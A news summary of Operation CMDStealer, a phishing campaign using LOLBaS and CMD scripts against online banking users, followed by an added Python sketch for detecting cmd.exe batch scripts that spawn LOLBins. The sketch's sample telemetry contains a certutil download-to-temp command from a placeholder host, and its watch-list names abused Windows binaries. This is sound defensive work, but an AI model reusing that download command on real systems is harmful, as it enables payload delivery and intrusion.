Online banking accounts in Mexico, Peru, and Portugal are being targeted by a new, financially motivated campaign dubbed Operation CMDStealer and attributed to a Brazilian threat actor, according to The Hacker News. The operation relies on social engineering to get living-off-the-land binaries and scripts (LOLBaS) and CMD-based scripts onto victim machines, which are then used to steal the data needed to move funds out of the accounts.
Attacks begin with Spanish- and Portuguese-language emails that claim to concern tax or traffic violations. Each carries an HTML attachment that retrieves the next-stage payload, a RAR archive, and the chain ultimately ends in the theft of Microsoft Outlook data and stored passwords, a report from the BlackBerry Research and Intelligence Team revealed.
"LOLBaS and CMD-based scripts help threat actors avoid detection by traditional security measures. The scripts leverage built-in Windows tools and commands, allowing the threat actor to evade endpoint protection platform (EPP) solutions, and bypass security systems," said BlackBerry, which also noted attackers' increased targeting of online business accounts.
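The infection chain above (HTML attachment, RAR archive, CMD script, built-in Windows tools) is exactly the kind of behaviour that signature-based endpoint protection misses, because every binary involved is signed by Microsoft. A practical counter is to look at process lineage rather than file hashes. The example below is added here and is not code from the article or from BlackBerry: it correlates constructed, Sysmon-style process-creation records and flags any binary from an assumed set of LOLBAS-project tools whose parent is cmd.exe running a .cmd or .bat script. The specific binaries, hostnames, paths and URLs are illustrative assumptions; the article does not say which Windows tools the campaign invoked.

```python
"""Detection sketch: flag cmd.exe-driven batch scripts that launch LOLBins.

Added example, not part of the original article or BlackBerry's report.
The LOLBIN set, hostnames, paths and URLs below are assumptions made for
illustration; the article names none of them.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

# Assumed watch-list drawn from the public LOLBAS project; the campaign's
# actual tool choice is not stated in the article.
LOLBINS = {
    "certutil.exe", "bitsadmin.exe", "mshta.exe", "rundll32.exe",
    "regsvr32.exe", "wscript.exe", "cscript.exe", "powershell.exe",
}
# A command line that references a batch/CMD script.
SCRIPT_REF = re.compile(r"\.(?:cmd|bat)\b", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (subset of Sysmon Event ID 1 fields)."""
    host: str
    pid: int
    ppid: int
    image: str
    cmdline: str


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def find_cmd_script_lolbin_chains(
    events: Iterable[ProcEvent],
) -> List[Tuple[ProcEvent, ProcEvent]]:
    """Return (parent, child) pairs where a LOLBin is spawned by cmd.exe
    that is itself executing a .cmd/.bat script. Parent lookup is keyed on
    (host, pid) so events from different hosts are never cross-correlated."""
    events = list(events)
    by_key: Dict[Tuple[str, int], ProcEvent] = {(e.host, e.pid): e for e in events}
    hits: List[Tuple[ProcEvent, ProcEvent]] = []
    for child in events:
        if basename(child.image) not in LOLBINS:
            continue
        parent = by_key.get((child.host, child.ppid))
        if parent is None or basename(parent.image) != "cmd.exe":
            continue
        if not SCRIPT_REF.search(parent.cmdline):
            continue  # interactive or one-off cmd.exe, not a dropped script
        hits.append((parent, child))
    return hits


# Constructed sample telemetry (not real campaign data).
SAMPLE_EVENTS = [
    # Benign: an admin runs an interactive cmd.exe and calls certutil by hand.
    ProcEvent("ws01", 400, 10, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent("ws01", 410, 400, r"C:\Windows\System32\cmd.exe", '"cmd.exe"'),
    ProcEvent("ws01", 411, 410, r"C:\Windows\System32\certutil.exe",
              "certutil.exe -hashfile report.pdf SHA256"),
    # Suspicious: Explorer opens an extracted batch file, which pulls a payload.
    ProcEvent("ws02", 500, 10, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent("ws02", 510, 500, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Users\ana\AppData\Local\Temp\multa\aviso.cmd"'),
    ProcEvent("ws02", 511, 510, r"C:\Windows\System32\certutil.exe",
              "certutil.exe -urlcache -split -f https://example.invalid/s2 %TEMP%\\s2.bin"),
    # Benign: rundll32 launched by svchost, not by a script.
    ProcEvent("ws02", 520, 4, r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    ProcEvent("ws02", 521, 520, r"C:\Windows\System32\rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
]


def run_sample() -> List[Tuple[str, str]]:
    """Convenience wrapper: (host, child image basename) for each hit."""
    return [(p.host, basename(c.image)) for p, c in find_cmd_script_lolbin_chains(SAMPLE_EVENTS)]


if __name__ == "__main__":
    for parent, child in find_cmd_script_lolbin_chains(SAMPLE_EVENTS):
        print(f"[{child.host}] {parent.cmdline!r} -> {child.cmdline!r}")
```

Only the ws02 chain is reported: the interactive certutil use on ws01 has no script in its parent's command line, and the rundll32 on ws02 is not a child of cmd.exe at all. In production this logic would sit in a SIEM rule over real Sysmon or EDR telemetry and would be tuned with an allow-list for known batch-driven software deployment.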